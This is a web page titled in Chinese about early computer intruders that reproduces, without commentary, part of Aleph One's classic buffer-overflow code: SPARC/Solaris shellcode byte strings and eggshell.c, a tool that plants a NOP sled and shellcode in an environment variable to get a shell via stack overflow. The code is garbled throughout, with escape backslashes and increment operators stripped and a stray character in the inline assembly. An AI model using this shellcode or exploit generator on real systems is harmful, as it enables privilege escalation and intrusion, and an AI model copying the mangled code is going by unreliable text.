早期的电脑入侵者

"x80xe8xdcxffxffxff/bin/sh";

unsigned long get_sp(void) {

__asm__("movl %esp,陎");

}

#elif defined(__sparc__) && defined(__sun__) && defined(__svr4__)

#define NOP_SIZE 4

char nop[]="xacx15xa1x6e";

char shellcode[] =

"x2dx0bxd8x9axacx15xa1x6ex2fx0bxdcxdax90x0bx80x0e"

"x92x03xa0x08x94x1ax80x0ax9cx03xa0x10xecx3bxbfxf0"

"xdcx23xbfxf8xc0x23xbfxfcx82x10x20x3bx91xd0x20x08"

"x90x1bxc0x0fx82x10x20x01x91xd0x20x08";

unsigned long get_sp(void) {

__asm__("or %sp, %sp, %i0");

}

#elif defined(__sparc__) && defined(__sun__)

#define NOP_SIZE 4

char nop[]="xacx15xa1x6e";

char shellcode[] =

"x2dx0bxd8x9axacx15xa1x6ex2fx0bxdcxdax90x0bx80x0e"

"x92x03xa0x08x94x1ax80x0ax9cx03xa0x10xecx3bxbfxf0"

"xdcx23xbfxf8xc0x23xbfxfcx82x10x20x3bxaax10x3fxff"

"x91xd5x60x01x90x1bxc0x0fx82x10x20x01x91xd5x60x01";

unsigned long get_sp(void) {

__asm__("or %sp, %sp, %i0");

}

#endif

------------------------------------------------------------------------------

eggshell.c

------------------------------------------------------------------------------

/*

* eggshell v1.0

*

* Aleph One / aleph1@underground.org

*/

#include <stdlib.h>

#include <stdio.h>

#include "shellcode.h"

#define DEFAULT_OFFSET 0

#define DEFAULT_BUFFER_SIZE 512

#define DEFAULT_EGG_SIZE 2048

void usage(void);

void main(int argc, char *argv[]) {

char *ptr, *bof, *egg;

long *addr_ptr, addr;

int offset=DEFAULT_OFFSET, bsize=DEFAULT_BUFFER_SIZE;

int i, n, m, c, align=0, eggsize=DEFAULT_EGG_SIZE;

while ((c = getopt(argc, argv, "a:b:e:o:")) != EOF)

switch (c) {

case 'a':

align = atoi(optarg);

break;

case 'b':

bsize = atoi(optarg);

break;

case 'e':

eggsize = atoi(optarg);

break;

case 'o':

offset = atoi(optarg);

break;

case '?':

usage();

exit(0);

}

if (strlen(shellcode) > eggsize) {

printf("Shellcode is larger the the egg. ");

exit(0);

}

if (!(bof = malloc(bsize))) {

printf("Can't allocate memory. ");

exit(0);

}

if (!(egg = malloc(eggsize))) {

printf("Can't allocate memory. ");

exit(0);

}

addr = get_sp() - offset;

printf("[ Buffer size: %d Egg size: %d Aligment: %d ] ",

bsize, eggsize, align);

printf("[ Address: 0x%x Offset: %d ] ", addr, offset);

addr_ptr = (long *) bof;

for (i = 0; i < bsize; i =4)

*(addr_ptr ) = addr;

ptr = egg;

for (i = 0; i <= eggsize - strlen(shellcode) - NOP_SIZE; i = NOP_SIZE)

for (n = 0; n < NOP_SIZE; n ) {

m = (n align) % NOP_SIZE;

*(ptr ) = nop[m];

}

for (i = 0; i < strlen(shellcode); i )

*(ptr ) = shellcode[i];

bof[bsize - 1] = '';

egg[eggsize - 1] = '';

memcpy(egg,"EGG=",4);

putenv(egg);

memcpy(bof,"BOF=",4);

putenv(bof);

system("/bin/sh");

}

void usage(void) {

(void)fprintf(stderr,

"usage: eggshell [-a ] [-b ] [-e ] [-o ] ");

}'